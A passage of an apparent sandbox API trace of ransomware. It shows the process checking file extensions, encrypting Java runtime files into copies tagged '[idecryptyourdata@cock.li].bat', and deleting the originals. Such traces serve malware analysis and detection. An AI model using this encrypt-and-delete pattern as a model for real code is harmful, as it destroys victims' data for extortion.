(lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\orbd.exe") returned 47 [0198.508] lstrlenW (lpString=".doc") returned 4 [0198.508] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0198.508] lstrlenW (lpString=".docx") returned 5 [0198.508] lstrcmpiW (lpString1=".docx", lpString2="d.exe") returned -1 [0198.508] lstrlenW (lpString=".pdf") returned 4 [0198.508] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0198.508] lstrlenW (lpString=".xls") returned 4 [0198.508] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0198.508] lstrlenW (lpString=".xlsx") returned 5 [0198.508] lstrcmpiW (lpString1=".xlsx", lpString2="d.exe") returned -1 [0198.508] lstrlenW (lpString=".ppt") returned 4 [0198.508] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0198.508] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\orbd.exe") returned 47 [0198.508] lstrlenW (lpString=".zip") returned 4 [0198.508] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0198.508] lstrlenW (lpString=".rar") returned 4 [0198.508] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0198.508] lstrlenW (lpString=".bz2") returned 4 [0198.508] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0198.508] lstrlenW (lpString=".7z") returned 3 [0198.508] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0198.508] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\orbd.exe") returned 47 [0198.508] lstrlenW (lpString=".dbf") returned 4 [0198.508] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0198.508] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\orbd.exe") returned 47 [0198.508] lstrlenW (lpString=".1cd") returned 4 [0198.508] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0198.508] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\orbd.exe") returned 47 [0198.508] lstrlenW (lpString=".jpg") returned 4 [0198.508] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0198.508] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\orbd.exe") returned 47 [0198.508] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\orbd.exe") returned 47 [0198.508] lstrlenW (lpString=".doc") returned 4 [0198.508] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0198.509] lstrlenW (lpString=".docx") returned 5 [0198.509] lstrcmpiW (lpString1=".docx", lpString2="d.exe") returned -1 [0198.509] lstrlenW (lpString=".pdf") returned 4 [0198.509] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0198.509] lstrlenW (lpString=".xls") returned 4 [0198.509] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0198.509] lstrlenW (lpString=".xlsx") returned 5 [0198.509] lstrcmpiW (lpString1=".xlsx", lpString2="d.exe") returned -1 [0198.509] lstrlenW (lpString=".ppt") returned 4 [0198.509] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0198.509] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\orbd.exe") returned 47 [0198.509] lstrlenW (lpString=".zip") returned 4 [0198.509] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0198.509] lstrlenW (lpString=".rar") returned 4 [0198.509] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0198.509] lstrlenW (lpString=".bz2") returned 4 [0198.509] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0198.509] lstrlenW (lpString=".7z") returned 3 [0198.509] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0198.509] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\orbd.exe") returned 47 [0198.509] lstrlenW (lpString=".dbf") returned 4 [0198.509] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0198.509] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\orbd.exe") returned 47 [0198.509] lstrlenW (lpString=".1cd") returned 4 [0198.509] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0198.509] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\orbd.exe") returned 47 [0198.509] lstrlenW (lpString=".jpg") returned 4 [0198.509] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0198.509] lstrcmpiW (lpString1=".exe", lpString2=".bat") returned 1 [0198.509] lstrlenW (lpString="pack200.exe") returned 11 [0198.509] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\pack200.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\pack200.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0198.510] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x34dff14 | out: lpFileSize=0x34dff14*=16448) returned 1 [0198.510] CloseHandle (hObject=0x350) returned 1 [0198.510] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\pack200.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\pack200.exe")) returned 0x20 [0198.510] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\pack200.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\pack200.exe.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0198.510] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\pack200.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\pack200.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0198.510] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.510] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.510] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\pack200.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\pack200.exe.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0198.511] GetLastError () returned 0x0 [0198.511] ReadFile (in: hFile=0x350, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x4040, lpOverlapped=0x0) returned 1 [0198.549] WriteFile (in: hFile=0x3a0, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0x4050, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0x4050, lpOverlapped=0x0) returned 1 [0198.551] ReadFile (in: hFile=0x350, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x0, lpOverlapped=0x0) returned 1 [0198.551] WriteFile (in: hFile=0x3a0, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0xea, lpOverlapped=0x0) returned 1 [0198.551] SetEndOfFile (hFile=0x3a0) returned 1 [0198.552] CloseHandle (hObject=0x3a0) returned 1 [0198.552] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.552] SetEndOfFile (hFile=0x350) returned 1 [0198.553] CloseHandle (hObject=0x350) returned 1 [0198.553] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\pack200.exe.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0198.553] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\pack200.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\pack200.exe")) returned 1 [0198.553] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\pack200.exe") returned 50 [0198.553] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\pack200.exe") returned 50 [0198.553] lstrlenW (lpString=".doc") returned 4 [0198.553] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0198.553] lstrlenW (lpString=".docx") returned 5 [0198.553] lstrcmpiW (lpString1=".docx", lpString2="0.exe") returned -1 [0198.553] lstrlenW (lpString=".pdf") returned 4 [0198.553] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0198.553] lstrlenW (lpString=".xls") returned 4 [0198.553] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0198.553] lstrlenW (lpString=".xlsx") returned 5 [0198.553] lstrcmpiW (lpString1=".xlsx", lpString2="0.exe") returned -1 [0198.553] lstrlenW (lpString=".ppt") returned 4 [0198.553] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0198.553] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\pack200.exe") returned 50 [0198.553] lstrlenW (lpString=".zip") returned 4 [0198.553] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0198.554] lstrlenW (lpString=".rar") returned 4 [0198.554] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0198.554] lstrlenW (lpString=".bz2") returned 4 [0198.554] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0198.554] lstrlenW (lpString=".7z") returned 3 [0198.554] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0198.554] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\pack200.exe") returned 50 [0198.554] lstrlenW (lpString=".dbf") returned 4 [0198.554] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0198.554] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\pack200.exe") returned 50 [0198.554] lstrlenW (lpString=".1cd") returned 4 [0198.554] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0198.554] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\pack200.exe") returned 50 [0198.554] lstrlenW (lpString=".jpg") returned 4 [0198.554] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0198.554] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\pack200.exe") returned 50 [0198.554] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\pack200.exe") returned 50 [0198.554] lstrlenW (lpString=".doc") returned 4 [0198.554] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0198.554] lstrlenW (lpString=".docx") returned 5 [0198.554] lstrcmpiW (lpString1=".docx", lpString2="0.exe") returned -1 [0198.554] lstrlenW (lpString=".pdf") returned 4 [0198.554] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0198.554] lstrlenW (lpString=".xls") returned 4 [0198.554] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0198.554] lstrlenW (lpString=".xlsx") returned 5 [0198.554] lstrcmpiW (lpString1=".xlsx", lpString2="0.exe") returned -1 [0198.554] lstrlenW (lpString=".ppt") returned 4 [0198.554] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0198.554] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\pack200.exe") returned 50 [0198.554] lstrlenW (lpString=".zip") returned 4 [0198.554] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0198.555] lstrlenW (lpString=".rar") returned 4 [0198.555] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0198.555] lstrlenW (lpString=".bz2") returned 4 [0198.555] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0198.555] lstrlenW (lpString=".7z") returned 3 [0198.555] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0198.555] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\pack200.exe") returned 50 [0198.555] lstrlenW (lpString=".dbf") returned 4 [0198.555] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0198.555] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\pack200.exe") returned 50 [0198.555] lstrlenW (lpString=".1cd") returned 4 [0198.555] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0198.555] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\pack200.exe") returned 50 [0198.555] lstrlenW (lpString=".jpg") returned 4 [0198.555] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0198.555] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0198.555] lstrlenW (lpString="npjp2.dll") returned 9 [0198.555] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\npjp2.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\plugin2\\npjp2.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0198.556] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x34dff14 | out: lpFileSize=0x34dff14*=234560) returned 1 [0198.556] CloseHandle (hObject=0x350) returned 1 [0198.556] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\npjp2.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\plugin2\\npjp2.dll")) returned 0x20 [0198.556] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\npjp2.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\plugin2\\npjp2.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0198.556] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\npjp2.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\plugin2\\npjp2.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0198.556] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.556] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.556] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\npjp2.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\plugin2\\npjp2.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0198.582] GetLastError () returned 0x0 [0198.582] ReadFile (in: hFile=0x350, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x39440, lpOverlapped=0x0) returned 1 [0198.629] WriteFile (in: hFile=0x3a0, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0x39450, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0x39450, lpOverlapped=0x0) returned 1 [0198.632] ReadFile (in: hFile=0x350, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x0, lpOverlapped=0x0) returned 1 [0198.632] WriteFile (in: hFile=0x3a0, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0xe6, lpOverlapped=0x0) returned 1 [0198.632] SetEndOfFile (hFile=0x3a0) returned 1 [0198.632] CloseHandle (hObject=0x3a0) returned 1 [0198.632] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.633] SetEndOfFile (hFile=0x350) returned 1 [0198.634] CloseHandle (hObject=0x350) returned 1 [0198.634] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\npjp2.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0198.635] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\npjp2.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\plugin2\\npjp2.dll")) returned 1 [0198.635] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\npjp2.dll") returned 56 [0198.635] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\npjp2.dll") returned 56 [0198.635] lstrlenW (lpString=".doc") returned 4 [0198.635] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0198.635] lstrlenW (lpString=".docx") returned 5 [0198.635] lstrcmpiW (lpString1=".docx", lpString2="2.dll") returned -1 [0198.635] lstrlenW (lpString=".pdf") returned 4 [0198.635] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0198.635] lstrlenW (lpString=".xls") returned 4 [0198.635] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0198.635] lstrlenW (lpString=".xlsx") returned 5 [0198.635] lstrcmpiW (lpString1=".xlsx", lpString2="2.dll") returned -1 [0198.635] lstrlenW (lpString=".ppt") returned 4 [0198.635] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0198.635] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\npjp2.dll") returned 56 [0198.635] lstrlenW (lpString=".zip") returned 4 [0198.635] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0198.635] lstrlenW (lpString=".rar") returned 4 [0198.635] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0198.635] lstrlenW (lpString=".bz2") returned 4 [0198.635] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0198.635] lstrlenW (lpString=".7z") returned 3 [0198.635] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0198.635] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\npjp2.dll") returned 56 [0198.635] lstrlenW (lpString=".dbf") returned 4 [0198.635] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0198.635] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\npjp2.dll") returned 56 [0198.635] lstrlenW (lpString=".1cd") returned 4 [0198.635] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0198.635] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\npjp2.dll") returned 56 [0198.635] lstrlenW (lpString=".jpg") returned 4 [0198.636] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0198.636] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\npjp2.dll") returned 56 [0198.636] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\npjp2.dll") returned 56 [0198.636] lstrlenW (lpString=".doc") returned 4 [0198.636] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0198.636] lstrlenW (lpString=".docx") returned 5 [0198.636] lstrcmpiW (lpString1=".docx", lpString2="2.dll") returned -1 [0198.636] lstrlenW (lpString=".pdf") returned 4 [0198.636] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0198.636] lstrlenW (lpString=".xls") returned 4 [0198.636] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0198.636] lstrlenW (lpString=".xlsx") returned 5 [0198.636] lstrcmpiW (lpString1=".xlsx", lpString2="2.dll") returned -1 [0198.636] lstrlenW (lpString=".ppt") returned 4 [0198.636] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0198.636] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\npjp2.dll") returned 56 [0198.636] lstrlenW (lpString=".zip") returned 4 [0198.636] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0198.636] lstrlenW (lpString=".rar") returned 4 [0198.636] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0198.636] lstrlenW (lpString=".bz2") returned 4 [0198.636] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0198.636] lstrlenW (lpString=".7z") returned 3 [0198.636] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0198.636] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\npjp2.dll") returned 56 [0198.636] lstrlenW (lpString=".dbf") returned 4 [0198.636] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0198.636] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\npjp2.dll") returned 56 [0198.636] lstrlenW (lpString=".1cd") returned 4 [0198.636] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0198.636] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\npjp2.dll") returned 56 [0198.636] lstrlenW (lpString=".jpg") returned 4 [0198.636] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0198.637] lstrcmpiW (lpString1=".exe", lpString2=".bat") returned 1 [0198.637] lstrlenW (lpString="policytool.exe") returned 14 [0198.637] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\policytool.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\policytool.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0198.637] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x34dff14 | out: lpFileSize=0x34dff14*=16448) returned 1 [0198.637] CloseHandle (hObject=0x350) returned 1 [0198.637] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\policytool.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\policytool.exe")) returned 0x20 [0198.637] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\policytool.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\policytool.exe.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0198.637] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\policytool.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\policytool.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0198.637] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.637] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.638] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\policytool.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\policytool.exe.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0198.638] GetLastError () returned 0x0 [0198.638] ReadFile (in: hFile=0x350, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x4040, lpOverlapped=0x0) returned 1 [0198.659] WriteFile (in: hFile=0x3a0, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0x4050, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0x4050, lpOverlapped=0x0) returned 1 [0198.660] ReadFile (in: hFile=0x350, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x0, lpOverlapped=0x0) returned 1 [0198.660] WriteFile (in: hFile=0x3a0, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0xf0, lpOverlapped=0x0) returned 1 [0198.660] SetEndOfFile (hFile=0x3a0) returned 1 [0198.660] CloseHandle (hObject=0x3a0) returned 1 [0198.660] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.660] SetEndOfFile (hFile=0x350) returned 1 [0198.661] CloseHandle (hObject=0x350) returned 1 [0198.661] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\policytool.exe.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0198.661] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\policytool.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\policytool.exe")) returned 1 [0198.662] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\policytool.exe") returned 53 [0198.662] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\policytool.exe") returned 53 [0198.662] lstrlenW (lpString=".doc") returned 4 [0198.662] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0198.662] lstrlenW (lpString=".docx") returned 5 [0198.662] lstrcmpiW (lpString1=".docx", lpString2="l.exe") returned -1 [0198.662] lstrlenW (lpString=".pdf") returned 4 [0198.662] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0198.662] lstrlenW (lpString=".xls") returned 4 [0198.662] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0198.662] lstrlenW (lpString=".xlsx") returned 5 [0198.662] lstrcmpiW (lpString1=".xlsx", lpString2="l.exe") returned -1 [0198.662] lstrlenW (lpString=".ppt") returned 4 [0198.662] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0198.662] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\policytool.exe") returned 53 [0198.662] lstrlenW (lpString=".zip") returned 4 [0198.662] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0198.662] lstrlenW (lpString=".rar") returned 4 [0198.662] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0198.662] lstrlenW (lpString=".bz2") returned 4 [0198.662] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0198.662] lstrlenW (lpString=".7z") returned 3 [0198.662] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0198.662] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\policytool.exe") returned 53 [0198.662] lstrlenW (lpString=".dbf") returned 4 [0198.662] lstrcmpiW 